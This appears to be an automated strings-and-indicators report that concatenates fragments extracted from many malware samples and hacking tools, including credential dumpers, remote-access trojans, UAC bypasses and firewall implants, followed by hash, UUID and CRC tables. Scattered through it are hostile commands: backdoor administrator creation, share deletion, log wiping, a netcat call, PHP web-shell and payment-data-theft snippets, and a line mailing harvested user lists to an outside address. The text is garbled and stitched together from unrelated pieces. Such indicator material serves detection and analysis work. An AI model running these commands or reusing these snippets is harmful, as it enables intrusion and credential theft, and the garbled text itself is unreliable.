1 whosthere-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologieswhosthere enters an infinite loop and searches for new logon sessions every 2 seconds. only new sessions are shown if found.dump output to a file, -o filenamethis tool lists the active lsa logon sessions with ntlm credentials.error: pth.dll is not in the current directory!.the output format is: username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 \\\\.\\slidttool[*] token system command[*] command add user 90sec 90sec[*] add to administrators success[*] user has been successfully addedprogram: %s%s%s%s%s%s%s%s%s%s%sc
1 administrator
1 @recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emcfgv7xc8itavgn0bmf!ctrhfex5m9jnzddfpk!vwbebxyx1nzrckblgqoiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"mail from:<subject: %s|%s|%s
1 mozilla/5.0 (windows; u; windows nt 5.1; en-us; rv:1.7.6)mozilla/5.0 (windows; u; windows nt 5.1; zh-cn; rv:1.7.6)?sessd=&sessc=&sessk=3a08fe7b8c4da6ed09f21c3ef97efce2_zn11cthreadpool10getbatcheserst6vectorist4pairissiesais2_ee_znss4_rep10_m_destroyerksaice@@glibcxx_3.4_znst6vectorimsaimee13_m_insert_auxen9__gnu_cxx17__normal_iteratoripms1_eerkm_znst6vectorist4pairissiesais1_ee13_m_insert_auxen9__gnu_cxx17__normal_iteratorips1_s3_eerks1__zst20__throw_out_of_rangepkc@@glibcxx_3.4pages.touchpadz.combat.touchpadz.comstat.touchpadz.comsk2.touchpadz.comtreasurehunter.pdbjucheckcmdlinedecryptedbarcodmsports.dllnddeapi.dllglmf32.dll<requestedexecutionlevel level=\"requireadministrator\" uiaccess=\"false\">cmutil.dllmprapi.dllskype.datskype.inicreatewindowyiwefhiwqcreatedesktopmydesktop
1 exehack all rights reserved.net user f4cknet localgroup administrators f4ckf4ckf4ckteam!@#kln7m5h8rsaa42vl0t5mrb1l$rndn = get-random$wc.headers.add(\"cookie\", \"p=\" + $rndn)
1 /h.ghttpheadget/library/launchedmy connect error with no ip!send file is failed****************************you have got it!****************************tw96awxsys81ljagkfdpbmrvd3m7ifu7ifdpbmrvd3mgtlqgns4xoyblbi1vuzsgcny6ms44ljaunskgr2vja28vmjawnja3mzegrmlyzwzvec8xljuumc41iezsb2nrlzauny40ljetw96awxsys81ljagkfgxmtsgvtsgtgludxggmi40ljitmibpntg2oyblbi1vuzsgbte4ksbhzwnrby8ymdaxmdezmsbozxrzy2fwztyvni4wmq==[\"cookie\",\"\"realauth=\"location\"];d3rmzxhlinclude '../../../../../../../../../../app/mage.php'; mage::app(); $q = mage::getmodel('sales/quote_payment')->getcollection();../../../../../../app/mage.php'; mage::app(); var_dump(mage::getmodel('sales/order')rul6qttvep5eqf9usxfjjgoovdnwfsgohdgluk+4onwxqnbgniqlttfyrgkb8d9base64_decode('b25lcgfnzxxny19hzg1pbg==')dnechdqbwtxu3dsmda1vmz1c29wuvfxduhpt0xyb0k3zdjywmfvzlf5y0zeehv4k2fnvmy0outjbzhnc0u3hktvvibst2mtgyrjy0vmzlqwo3d1vlafjvnvnnsgzuvuhkzxdebgxjutlxwwlqwst0cetacuzosxf4crb2jhatjvdurmnlhqz1zltgvjvnfobvdnmk5nbdlvbedbqvzkrzj1wmzusjdvownwwurzylz0l1btncteval(base64_decode($_posteval($undecode($tongji))<strong>www.zone-org</strong>echo eval(urldecode($dez = $pwddir.\"/\".$real;copy($uploaded, $dez);@$_($_request['eval(xxtea_decrypt** scam redirector$ooooo00oo0000oo0curl_close($cu);eval($o);};die();

ENCRYPTION:MD5S

Count MD5 Description
1 8a497cf4ffa8a173a7ac75f0de1f8d8b
1 ed132e13d1332bf7e2612a0eb848b30a
1 ec371748dc2da624b35a4f8f685dd122
1 abcdef1234567890abcdef1234567890
1 724ea055b975621b9d679f7077257bd9
1 0017687f6164706e6967060002008101
1 63a9f0ea7bb98050796b649e85481845

ENCRYPTION:SHA1S

Count SHA1 Description
1 cd46a1a84ba06cea35d5e0219062162f227fdb26

ENCRYPTION:SHA256S

Count SHA256 Description
1 efeb0a9c6aba4cf5958f41db6a31929776c643dedc65cc9b67ab8b0066ff2492

ENCRYPTION:UUIDS

Count Description UUID
1 UUID type 1 4d36e972-e325-11ce-bfc1-08002be10318
1 UUID type 4 5ffc0c8b-8be5-49d5-b9f2-bcdc8976ee10
1 UUID type 4 f21edc09-85d3-4eb9-915f-1afa2ff28153
1 UUID type 4 c0d9770c-9841-430d-b6e3-575dac8a8ebf
1 UUID type 4 774476df-c00f-4e3a-bf4a-6d8618cfa532
1 UUID type 4 5947bacd-63bf-4e73-95d7-0c8a98ab95f2
1 UUID type 4 53a4988c-f91f-4054-9076-220ac5ec03f3
1 UUID type 4 e2011457-1546-43c5-a5fe-008deee3d3f0
1 UUID type 4 820c02a4-578a-4750-a409-62c98f5e9237
1 UUID type 4 1ef9f94a-5664-48a6-b6e8-c3748db459b4

ENCRYPTION:CRCS

Count CRC Description
1 0x12
1 0x0004
1 0x60
1 0x400000
1 0x31
2 0xc000
1 0x5
3 0x6000
1 0x100000
1 0x56
1 0x0400
4 0x41
1 0x0666
1 0x2000
1 0x11112222
1 0x54
1 0x3
1 0x200
4 0x8000
1 0x57
1 0xa000
1 0x42c
1 0xc0
1 0x113
1 0x01
1 0xc
1 0xc3
1 0x55
1 0x70
1 0xe8
1 0x94
2 0x61
1 0x38
1 0x0008
1 0xff
1 0x40
1 0x0f
1 0x48
1 0x04

ENCRYPTION:BASE64S

Count Base64 Decoded
1 mOs=
1 V18= W_
1 4qI=

ENCRYPTION:LOGICS

Count Logic
2 SHA1
2 SHA256
2 SHA512
2 RC4
2 RC4
1 AEC
2 AEC
2 AEC

CREDS:SNNS

Count SSN
1 4
1 9

CREDS:LOGINS

Count UserPass
1 loginedquerytimeripaddress=%d.%d.%d.%d%s%s%02x-%02x-%02x-%02x-%02x-%02xcommand.comosversion=%slogined=%cmainfilename=%s
1 pass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
1 passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
1 user-agent: mozilla/5.0 (windows; u; windows nt 6.0; en-us) applewebkit/534.3 (khtml, like gecko) chrome/6.0.472.59 safari/534.3accept: text/xml\\r\\ncontent-type: application/x-www-form-urlencoded\\r\\naccept-encoding: no\\r\\nconnection: keep-alive%s/?t=%s&o=%s&i=%s&task_id=%s<xaml></xaml><b6><i6>pk
1 signingupdate.microsoft.com_crt_debugger_hookue8g5\\device\\-%s-%04dfal2.03xxxxxxxxxxxxxxx
1 pass->logon successful250 requested file action okay, completed.m
1 pass update\x00\x00%s:download\x00\x00%s:update\x00\x00%s:uninstall\x00?injectdll@@yahpauhwnd__@@k@z?unmapdll@@yahxz?g_bsubclassed@@3haacfg92kxpcso4y94bnurfmnnk27ehw6cqp5entad6af8bd5835d19cc7fdc4c62fdf02a1%s?cstorage=shell&comp=%s75baa77c842be168b0f66c42c7885997b523f63566f407f3834bcc54aaa32524svwf
1 passwordsnjloggertaskmgrkillerabccba%
1 userspace pathrecord () %pmutex object did not timeout, list not patchedget /ok.asp?id=1__sql__ http/1.1f
1 password=%sinternal command not support =((l|-1|as_cur_user:openprocesstoken():%d, %s|l|-1|createprocessasuser():%d, %s|l|-1|as_cur_user:logonuser():%d, %s|l|-1|try to run dll %s with user priv|\\\\.\\global\\pipe\\sdlrpc\\\\%s\\pipe\\comnodeplugin dll stop failed.as_user:logonuser():%dm
1 users:shared:userevent.app:contents:macos:rm '/users/shared/userevent.app/contents/resources/userevent.icns'osascript -e 'tell application \"system events\" to get the hidden of every login item'osascript -e 'tell application \"system events\" to get the name of every login item'osascript -e 'tell application \"system events\" to get the path of every login item'servervisible \x00.aspack.adataaspack.aspack.ccgbitartsdastub!epackfsg!kkrunchy.mackt.maskpemew.mpress1.mpress2.neolite.nsp1.nsp2.nsp0.packedpebundlepebundlepec2topecompact2pec1pec2pec2mopelocknt.perplexpeshield.petiteprocrypt.rlpackrcryptor.rpcrypt.sforce3.spack.svkpthemida.themida.upack.bydwingupx0upx1upx2.upx0.upx1.upx2.vmp0.vmp1.vmp2vprotectwinlicenwwpack.yp.y0damozilla/4.0 (compatible; msie 6.0; windows nt 5.; sv1)trj:html err.trj:workfunc start.trj:cmd time out.trj:thread time out.trj:create pt done.trj:create pt error: mutex already exists.create pippe failed!transfering fileput paras error:cmd time out..cmd has been killed.h
1 userid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
1 user-agent: netscapea
1 password%s found[%d][smb] host: %s account: %s error: account_change_passwordhydra -p pass.txt target cisco-enable (direct console access)[%d][smb] host: %s account: %s error: password expired[error] smtp login auth, either this auth is disabled\"/login.php:user=^user^&pass=^pass^&mid=123:incorrect\"used pepack!\\temp\\ntgodmode.exentgod.batsfxcmdc:\\temp\\vncviewer4.log[bl4ck] patched by redsand || http://blacksecurity.orgfake release extendedvkey 0x%x, keysym 0x%xpipecmd \\\\%s -u:%s -p:\"\" %s[usage]: %s <hostname|ip> <username> <password>pipecmd \\\\%s -u:%s -p:%s %s============by uhhuhy (feb 18,2003) - http://www.cnhonker.net===================================ntcmd v0.11 for hscan v1.20=======================ntcmd>mysql_pwd_crack 127.0.0.1 -x 3306 -p root -d userdict.txtsuccessfully --> username %s password %s zhouzhen@gmail.com http://zhouzhen.eviloctal.org-a automode automatic crack the mysql password mysql_pwd_crack 127.0.0.1 -x 3306 -ac
1 user:administrator /pwd:1234 /nowait trojan.exefail to injectbtgremote pro; v1.5 b/{permission denial to exec command.:(by eyas<cooleyas@21cn.com>connect to %s mssql server success.enjoy the shell.^_^usage: %s <host> <uid> <pwd>sqlcmd2.exe inside edition.http://www.patching.net 2000/12/14example: %s 192.168.0.1 sa \"\"a
1 userfirst-objectnew zealand1failed to get temp file for source aes decryptionfailed to get encryption header for pwd-protectfailed to get filetimefailed to delete temp file for password decoding (3)<iconfile>c:\\windows\\app.ico</iconfile>failed to read the entire file<versioncreatedby>14.4.0</versioncreatedby><progresscaption>run &quot;executor.bat&quot; once the shell has spawned.</prunning zip pipeline...<fintitle /><autotemp>0</autotemp><defaultdir>%temp%</defaultdir>aes encrypting...<unzipdir>%temp%</unzipdir>/bypassuac/bypassuac/bypassuac_utils.cpp/bypassuac/bypassuacdll/bypassuacdll.aps/bypassuac/bypassuac/bypassuac.icob
1 users/user/desktop/my_ok_2014/bit9/runsna/release/runsna.pdbd:/work/plug4.0(shellcode)/shellcode/shellcode/xsetting.hb
1 user-agent: mozilla/5.0 (windows nt 6.; wow64; rv:20.0) gecko/20100101 firefox/20.0webhp?rel=psy&hl=7&ai=
1 pass.txtselect sillyr_at_gmail_dot_com into dumpfile '%s\\\\sillyr_x.so' from sillyr_xscan.batgogogo.batip.txtfor /f %%i in (ips.txt) do (start cmd.bat %%i)445\\nc.exe445\\s.execs.exe %1445\\cs.exe445\\ip.txt445\\cmd.batnormal scan: about to scan %u ip for %u ports using %d threadsyn scan: about to scan %u ip for %u ports using %d threadexample: %s tcp 12.12.12.12 12.12.12.254 21 512 /bannersomething wrong about the portsperforming time: %d/%d/%d %d:%d:%d --> example: %s tcp 12.12.12.12/24 80 512 /t8 /save%u ports scanned.taking %d threads %-16s %-5d -> \"%s\"syn scan can only perform on win 2k or abovesyn scan: about to scan %s:%d using %d threadscan %s complete in %d hours %d minutes %d seconds. found %u open ports@sql.exe -f ip.txt -m syn -t 3306 -c 5000 -u http://60.15.124.106:63389/tasksvr.nc %1 4444for /f \"delims=\" %%x in (endend.txt) do call :lisoob %%xhttp://www.tzddos.com/ -------------------------------------------->byebye.txtren %systemroot%\\system32\\drivers\\tcpip.sys tcpip.sys.bakif /i \"%wangle%\"==\"\" ( goto start ) else ( goto erromm )copy *.tzddos scan.bat&del *.tzddosdel /f tcpip.sysif /i \"%cb%\"==\"www.tzddos.com\" ( goto mmbat ) else ( goto wangle )call scan.batif /i \"%erromm%\"==\"\" ( goto start ) else ( goto zuihoujh )if /i \"%zuihoujh%\"==\"\" ( goto start ) else ( goto laji )sc config lmhosts start= autocopy tcpip.sys %systemroot%\\system32\\drivers\\tcpip.sys > nulren %systemroot%\\system32\\dllcache\\tcpip.sys tcpip.sys.bak123456.com123123.com360.comjuso.comsina.comchangemechinanetlionkingmultithreading posts_send killerget [access point] http/1.1the program's need files was not exist!j
1 password : (null)[-] tbbuffcpy() failed![+] smb negotiation12345678-1234-abcd-ef00-0123456789abvalue must end with 0000 (2 nulls)[*] configuring payload[*] connecting to listener
1 username password commandauthentication id:authentication package:authentication domain:primary user:* user: * domain: * password: -slave-listenwating on port %d...\x0aend waiting2\x0a
1 userappdataroaming$trzframecontrollerpropertyconnectiondelphi32.exehkeycurrentuser%
1 username> <fixthings> [hostname]ls -la %s* ; /bin/cp ./wtmp.tmp %s; rm ./wtmp.tmperror: unlinking tmp wtmp file.usage: wipe [ u|w|l|a ] ...options...erase acct entries on tty : wipe a [username] [tty]alter lastlog entry : wipe l [username] [tty] [time] [host]%%appdata%%\\microsoft\\wuauclt\\wuauclt.datmozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)/news/show.asp?id%d=%d0l23kj@nboxu%%s.asp?id=%%d&sid=%%duser-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sp q%%d)cookies: useid=kgioodaook%%s<!--
1 user: %scomputername: %swindowsdirectory: %ssystem directory: %snumber of processors: %dcpu[%d]: %s: %smhzram: %dmb total, %dmb free.displaymode: %d x %d, %dhz, %dbituptime: %d days %02u:%02u:%02u\
1 usernameget_lastwritetimegetvolumeinformationosfullnamedownloaddatafm|'|'|nd|'|'|rn|'|'|sc~|'|'|scpk|'|'|cam|'|'|usb video device[endof]rs|'|'|proc|'|'|k|'|'|rg|'|'|~|'|'|kl|'|'|ret|'|'|pl|'|'|lv|'|'|prof|'|'|~|'|'|un|'|'|~[endof]p[endof]orcus.commandmanagementorcus.commands.orcus.config.orcus.connection.orcus.core.orcus.exeorcus.extensions.orcus.installationpromptformorcus.mainform.orcus.native.orcus.plugins.orcus.plugins.dllorcus.properties.orcus.protection.orcus.share.orcus.sharedorcus.staticcommandsorcus.utilities.\\projects\\orcus\\source\\orcus..orcus.plugins.dll.zip.orcus.shared.dll.zip.orcus.shared.utilities.dll.zip.orcus.staticcommands.dll.ziphvnccommunicationhvncactionhvncdesktoprequestkeylogcommandget_keylogfilelivekeyloggercommandorcus.staticcommands, version=prepareorcusfiletoremoveconvertfromorcusvaluekindboot.ldrd:\\workplug2.5plug3.0shell6gulp
1 user-agent: uploadorsteamappdata.vdfloginusers.vdfconfig.vdfj
1 pass,config,n{)phmysqlz\\dhlp\\.\\dhlp\\.shautocomplemainframek
1 passwordmitmproxy0\\insert_cert.exeelevator.dllfail adding certdownloadingfilefail adding cert: %sinternetopena failc:\\\\windows\\\\sysnative\\\\ntoskrnl.exe[*] traversing processes_getkprocess[*] loaderconfig %ploader.objmozilla/4.0 (compatible; msie 7.0; windows nt 6.1; wow64; trident/5.0; slcc2; .net clr 2.0.50727; .net clr 3.5.30729; .net clr 3[*] token restoreelevator.obj_getexportthe file uploaded failed !the file downloaded failed !common.aspxweber_server.exed:\\hellsing\\release\\msger\\d:\\hellsing\\sys\\xrat\\d:\\hellsing\\release\\exe\\d:\\hellsing\\sys\\xkat\\e:\\hellsing\\release\\claree:\\hellsing\\release\\irene\\d:\\hellsing\\sys\\irene\\msger_server.dllcmd.exe /c ping 127.0.0.1 -n 5&cmd.exe /c del /a /f \"%s\"xweber_install_uac.exes
1 userp4ss273ce6-b29f-90d618c0ace123dxace123dxl!ace123dx!@#x/catelog/login1.asp~dftmp$$$$$.1get /query.asp?loginid=loadconfigfromreg faildedloadconfigfrombuildin success/photoe/photo.asp httppost /photos/photo.asppcc_ident$$$--hellowrod--$$$.?avpcc_basemod@@ps1=rk# \\u@\\h:\\w \\$unset ls_options;uname -a[diskio]/tmp/.secure\x7felf\
1 user from sys.user_users a oci 8 - ocidescriptorfreeoracommand *msvbvm60.dll_cicosckmhv0
1 password.inipkloadstub.classpkloadstubdecrypted.classpkloadpassword.classpkdecryptstub.classpkclassloaders.classpkutil/oshelperalienspyconfig.xmlpkkey.classpksvd$1.classpksvd$2.classpkmensaje.classpkinic$shutdownhook.classuninstall.jarpkresources/icono.pngpkbss_serverclick_delay
1 usernameapacketsendpacketarpsniffpcap_loopsyntax: %s [-i file] [-o file] [-m minlen] [-m maxlen] [-c minsets] -l -u -n -p pw-inspectori:o:m:m:c:lunpsp
1 user f4cknet localgroup administrators f4ckf4ckf4ckteam!@#kln7m5h8rsaa42vl0t5mrb1l$rndn = get-random$wc.headers.add(\"cookie\", \"p=\" + $rndn)
1 userprofile%\\cookies s\\*.* rd /s /q %windir%\\temp & md %windir%\\temp del /f /s /q %systemdrive%\\recycled\\*.* del /f /s /q \"%userprofile%\\local settings\\temp\\*.*\" del /f /s /q \"%userprofile%\\local settings\\temporary internet files\\*.*\" tasklist |find \"clear.bat\"||start clear.bathttp://www.coffeewl.comping -n 2 localhost 1>nul 2>nulfor /l %%a in (mode con: cols=42 lines=5text files (*.txt);;all files (*)http://ubrute.comip - %d; password - %d; combination - %dget_crackedcredentialss
1 userprofile%w
1 user32.dlllogin.aspcheck.aspresult.aspupload.asp
1 user-agent: mozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1) ( /s ) :forms.vbpforms.vcpsoftware\\flysky\\e\\installname=\"microsoft.windows.common-controls\" e
1 loginpassclearlogsdaysclearlogsmailed oneshell tuhaoisrighto
1 passuac.exe/x64/bypassuac.exe/x86/bypassuacdll.dll/x64/bypassuacdll.dllafx_idp_command_failurew
1 user-infousers-infosoftware-info(from environment) = %snetuserenumgetnetworkparamsaccelorator<html><title>12356</title><body>g
1 users id failedcontrol time out 90 secs, connection closed-err post sms failedcurrent.hlthistroy.hlt-err send sms failed-err change password <new password>+ok send sms succussifully+ok set new password: [%s]change passwords:\\ammyy\\sources\\target\\trservice.cpps:\\ammyy\\sources\\target\\trdesktopcopyrect.cppglobal\\ammyy.target.incomeports:\\ammyy\\sources\\target\\trfmfilesys.cppplease enter password for accessing remote computercreateprocess1()#3 %d error=%dchttpclient::sendrequest2(%s, %s, %d) error: invalid host name.error: createprocessasuser() error=%d, session=%derror: findprocessbyname('explorer.exe')or: %s -r [host.tty]%s: process: character, ^x, or (octal) \\032 expected.type \"screen [-d] -r [pid.]tty.host\" to resume one of them.%s: at [identifier][%%|*|#] command [args]slurped only %d characters (of %d) into buffer - try againcommand from %s: %s %s[ passwords don't match - your armor crumbles away ][ passwords don't match - checking turned off ]writing packet : error on socket (or connection closed): %sremote connection closed by signal sig%s %sreading private key %s failed (bad passphrase ?)server closed connection%s: line %d: list delimiter not followed by keywordchecking for version `%s' in file %s required by file %sremote host closed connection%s: line %d: bad command `%s'verifying that server is a known host : file %s not found%s: line %d: expected service, found `%s'%s: line %d: list delimiter not followed by domainpublic key from server (%s) doesn't match user preference (%s)# pscan completed in %u seconds. (found %d ips)usage: %s <b-block> <port> [c-block]%s.%d.* (total: %d) (%.1f%% done)invalid ip.# scanning: unable to allocate socket.cat trueusers.txt | mail -s \"eyes\" clubby@slucia.commv scan.log bios.txtrm -rf bios.txtecho -e \"# by eyes.\"././pscan2 $1 22echo \"#cautam...\"echo -e \"${blu}private scanner by raphaello , demmonn , tzepelush & drac\\n\\rkillall -9 pscan2echo \"[*] ${dcyn}gata esti h4x0r ;-)${res} [*]\"echo -e \"${dcyn}@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#@#${res}\"snprintf(outfile, sizeof(outfile) - 1, \"scan.log\", argv[1], argv[2]);printf(\"usage: %s <b-block> <port> [c-block]\\n\", argv[0]);printf(\"\\n# pscan completed in %u seconds. (found %d ips)\\n\", (time(0) - scaconnlist[i].addr.sin_family = af_inet;snprintf(last, sizeof(last) - 1, \"%s.%d.* (total: %d) (%.1f%% done)\",wscript.echo \" $$\\ $$\\ $$\\ $$\\ $$$$$$\\ $$$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$plug-in thread causes an exception, failed to alert user.pluggetudpportpluggettcpportpluggetvulnnum\\\\.\\pipe\\pipecmd_communicatonpipecmd servicel
1 userosqlpasswordosqlservercmd /c net start %s%add%kartoxaa
1 pass
1 passwordchar@wsockhook.dllpsinitialsystemprocess @%ppslookupprocessbyprocessid(%u) failedpslookupprocessbyprocessid(%u) => %pfirststage() loaded, currentthread @%p stack %p - %pdic\\loginlist.txtradmin.exelamescan3.pdf!dic\\passlist.txtqy001service/.mikyc
1 userformuserloginforminvalid username or passwordpostupload_
1 user domaine
1 userv.dll
1 users\\mlk\\:\\w o r k s p a c e\\d:\\my\\projects_all\\2015\\\\tools pzz\\bezzahod\\intelrestorer
1 users\\cool\\documents\\visual studio 2010\\projects\\dlltest\\release\\dlltest.pdb\x00up file error\x0d\x0aup file ok\x0d\x0aaallaamoot
1 useragent.indexof(\"msie\") > -1) {string_of_json += detectpdfformsie();string_of_json += detectflashformsie();string_of_json += detectjavaformsie();string_of_json += enumerateplugins();0x77bd18d30x77bcef5b0x77bcf5190x77bd3e250x77be746a0x77bc1120// offset was 0x94 now 0xa4for (i = 1; i <= (0x42c-4) / 4; i++) {
1 username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in 